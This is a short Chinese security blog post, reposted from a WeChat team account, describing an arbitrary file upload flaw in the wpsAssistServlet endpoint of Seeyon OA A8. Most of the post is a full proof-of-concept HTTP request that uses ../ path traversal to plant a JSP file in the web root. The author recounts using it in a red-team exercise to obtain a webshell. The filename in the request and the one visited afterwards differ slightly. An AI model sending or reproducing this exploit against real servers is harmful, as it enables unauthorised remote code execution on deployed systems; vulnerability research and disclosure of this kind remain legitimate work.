0x00 概述
致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
影响版本:
0x01 正文
在实战攻防演练,信息搜集到某靶标有致远OA,且版本号恰好是A8,死马当活马医,碰运气复现一下。
PoC:(realFileType, fileId 参数可控,可以通过 ../ 遍历上传到任意目录下)
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2 HTTP/1.1Host:Content-Length: 349Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616bAccept-Encoding: gzip--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="upload"; filename="123.xls"Content-Type: application/vnd.ms-excel<% out.println("seeyon_vuln");%>--59229605f98b8cf290a7b8908b34616b--
访问:http://IP/debuggg.jsp
查看webshell工具,测试连接,成功getshell,水了100分美滋滋。
whoami查看当前用户
- End -
原文始发于微信公众号(NS Demon团队):致远OA wpsAssistServlet 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论